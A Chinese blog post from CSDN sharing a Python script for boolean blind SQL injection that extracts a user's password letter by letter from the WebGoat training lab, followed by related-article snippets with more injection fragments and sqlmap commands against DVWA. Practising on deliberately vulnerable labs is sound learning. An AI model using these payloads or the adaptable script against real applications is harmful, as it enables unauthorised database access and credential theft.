python实现sql盲注

最新推荐文章于 2024-05-14 12:33:12 发布
最新推荐文章于 2024-05-14 12:33:12 发布
阅读量721 收藏 3
点赞数 1
分类专栏: WebGoat python # 注入 文章标签: python sql 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/elephantxiang/article/details/114272471
版权
WebGoat 同时被 3 个专栏收录
23 篇文章 10 订阅
订阅专栏
注入
22 篇文章 17 订阅
订阅专栏
python
8 篇文章 1 订阅
订阅专栏

背景介绍

本文这段python代码之前发布在我的博客WebGoat (A1) SQL Injection (advanced)中,用于通过sql布尔盲注获取WebGoat SQL Injection (advanced)第5页的用户tom的密码。

代码比较简单 ,这里单独拎出来主要是为了自己以后查阅方便。如果遇到其他注入问题,可以简单修改本脚本。如果以后代码有较大优化,会更新本文。

代码

import requests


url = "http://192.168.101.16:8222/WebGoat/SqlInjectionAdvanced/challenge"
headers={ "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36","Cookie": "JSESSIONID=VjGdZj9IvzWQ9BJFIEar2--CEun-GVI0GnBVU7nE",}
 
keylist = [chr(i) for i in range(33, 127)]                                     #包括数字、大小写字母、特殊字符
answer = ''

for i in range(1,24):
    for c in keylist:
        payload = "tom' and substring(password,"+str(i)+",1)='"+c+"'-- ss"     #用substring逐位猜测密码
        formdata = {
        "username_reg":payload,
        "email_reg":"123@123.com",
        "password_reg":"12",
        "confirm_password_reg":"12",
        }
        response = requests.put(url, data = formdata, headers = headers)       #本题用的PUT方法传输客户端参数,如果遇到其他题目用POST方法,则改为requests.post
        if response.text.find("already exists") != -1:                         #猜对了的话返回结果会包含already exists
            answer = answer+c
            break
print(answer)                                                                  #打印结果

顺便感叹一下requests模块真好用。

我这里用的是python3,因为python3自带requests模块了,python2我看网上说也支持,但应该是要自己安装的。

仙女象
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 6
    评论
专栏目录
sql盲注python
yy2013
10-07 474
写一款工具,可以用来进行sql盲注 前提: 数据库是mysql工具中使用的sql语句: 判断表是否存在: (select count(*) from tablename)>0 判断列是否存在:(select count(*) from tablename where 列名=)>0 猜字段中记录长度 ;and (select top 1 len(字段名) from 数据
sql 布尔盲注 python脚本实现
sophia9301的博客
10-12 7676
渣渣一枚,把学习sql注入过程中遇到的一些问题记录下来,以供日后参考。 按照网上教程注入时发现过滤了union = < > ,顿时就一脸懵逼,因为不会构造sql语句,更不会绕过,最后在师父的指导下,首先通过手工注入,注入出了数据库名及长度。 1.数据库名长度: http://XXX.XXX.XX/sql.php? id=345’ and length(database()) like 1 an
sql盲注python脚本
weixin_48266255的博客
08-29 449
【代码】sql盲注python脚本。
最新超硬核,SQL注入之时间盲注,原理+步骤+实战思路,2024年最新附带学习经验
最新发布
2301_76224593的博客
05-14 813
本人从事网路安全工作12年,曾在2个大厂工作过,安全服务、售后服务、售前、攻防比赛、安全讲师、销售经理等职位都做过,对这个行业了解比较全面。最近遍览了各种网络安全类的文章,内容参差不齐,其中不伐有大佬倾力教学,也有各种不良机构浑水摸鱼,在收到几条私信,发现大家对一套完整的系统的网络安全从学习路线到学习资料,甚至是工具有着不小的需求。最后,我将这部分内容融会贯通成了一套282G的网络安全资料包,所有类目条理清晰,知识点层层递进,需要的小伙伴可以点击下方小卡片领取哦!
基于pythonsql注入脚本
03-04
适合刚学pythonsql注入的人 import urllib2 import re
python-盲注
qq_41232519的博客
04-22 387
import requests import time #目标url url = 'http://192.168.8.152/sql/Less-1/?id=1' #查库语句 database = 'select schema_name from information_schema.schemata' #查当前表语句 table = 'select table_name from infor...
python编写的sql盲注
10-28
python编写的sql盲注
布尔盲注.py_sql盲注python_
10-03
在这个场景中,我们关注的是一个名为"布尔盲注.py"的Python脚本,它显然是用于演示或执行SQL盲注的工具。 在SQL盲注中,攻击者通常不能直接看到查询结果,而是必须依赖于应用程序对查询成功或失败的间接响应。例如...
DVWA-SQL盲注脚本(全)
10-04
DVWA SQL盲注,Low,Medium,High 三个级别的bool盲注脚本,比较完整,配套解释 : https://blog.csdn.net/csdn_Pade/article/details/82886765
CTFSQL盲注.py
11-25
CTF解题中有时会用到盲注,这是一段SQL盲注代码,运行于python37环境,多个字段信息提取的句子已注释保存。
python连接sqlserver数据库自己写的盲注sqlserver的python脚本
01-30
本文将深入探讨如何使用Python连接SQL Server数据库,并实现SQL盲注功能。 首先,Python提供了一个名为`pyodbc`的库,它是Python连接多种数据库的桥梁,包括SQL Server。安装`pyodbc`可以使用pip命令: ``` pip ...
爱上python盲注探测脚本
dfdhxb995397的博客
09-13 161
  本文转自:i春秋论坛 前言:   最近在学python,做了个盲注的简单的跑用户的脚本,仅做个记录。   sqmap也有不灵的时候,有时需要根据情况自写脚本探测   正文:   本地用大表姐给的sql和php文件搭建了个布尔盲注的靶机   另外感谢大表姐的指导。   稍作解释:注入语句里用%s占位,等待在for循里面依次判断长度 [App...
python substr_python盲注
weixin_39695306的博客
11-27 88
给大家来一份python盲注的代码我自己改了一些内容,到时候我把其封装成为.exe文件,或者.apk文件,再把资源发出来,接下来是代码 import requests# 爆数据库长度def db_length(url,s): db_length = 0 for i in range(1, 20): db_payload = "2%s and (length(da...
sql盲注脚本
、moddemod
06-14 998
# moddemod # 2019/6/13 # 8:23 # PyCharm import requests import re """ base_url = "http://127.0.0.1/sqli-labs/Less-8/?id=1" """ base_url = "http://127.0.0.1/sqli-labs/Less-8/?id=1" class Blind(object...
python实现sql宽字节注入+布尔盲注
箭雨镜屋
05-01 508
一、注意点 本文代码是对着pikachu漏洞靶场的宽字节注入关卡开发的,代码中的payload和参数都基于此,使用本文代码需要修改payload和部分参数,具体见代码注释 比起单纯的布尔盲注 二、代码 三、使用 四、测试 ...
Python自动化sql注入:布尔盲注_布尔盲注脚本
2401_83739411的博客
04-07 819
学好 Python 不论是就业还是做副业赚钱都不错,但要学会 Python 还是要有一个学习规划。最后大家分享一份全套的 Python 学习资料,给那些想学习 Python 的小伙伴们一点帮助!
比二分法更OK的盲注多线程(python脚本)
jpygx123的博客
11-21 1450
 废话不多说直接上代码: import threading import requests user_agent = [ "Mozilla/5.0 (Windows NT 6.0) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.36 Safari/536.5", "Mozilla/5...
python解决盲注和延迟注入笔记
qq_43571759的博客
03-15 985
python解决盲注和延迟注入笔记 requests模块 要用python解决这一问题需要了解request这个模块,我下载的是pycharm所以自带这个模块不用安装,需要安装的话 pip install requests pip命令执行就能安装成功,然后是关于requests模块的一些函数: get请求 post请求 res=request.get(url,params=dat...
词达人小工具2
m0_61369360的博客
04-27 268
【代码】词达人小工具2。
pythonsql盲注dvwa
09-23
PythonSQL盲注是指通过构造特定的SQL语句来绕过应用程序的安全机制,并获取未经授权的数据。在DVWA漏洞测试环境中进行SQL盲注,可以使用sqlmap工具。下面是使用sqlmap进行DVWA的SQL盲注的步骤: 1. 首先,确保你已经安装了sqlmap工具并配置好环境。 2. 使用命令行进入到sqlmap工具所在的目录。 3. 输入以下命令,获取数据库dvwa的所有表: ``` python sqlmap.py -u "http://192.168.101.66/bachang/DVWA-master/vulnerabilities/sqli_blind/?id=1&Submit=Submit#" --cookie "security=low;PHPSESSID=n2nqkt6qqt524ehqmae57srcu6" --tables -D dvwa ``` 4. 输入以下命令,获取数据库表users的所有列: ``` python sqlmap.py -u "http://192.168.101.66/bachang/DVWA-master/vulnerabilities/sqli_blind/?id=1&Submit=Submit#" --cookie "security=low;PHPSESSID=n2nqkt6qqt524ehqmae57srcu6" --columns -D dvwa -T users ``` 通过以上步骤,你可以使用sqlmap工具进行DVWA的SQL盲注,获取数据库表和列的信息。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 6
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值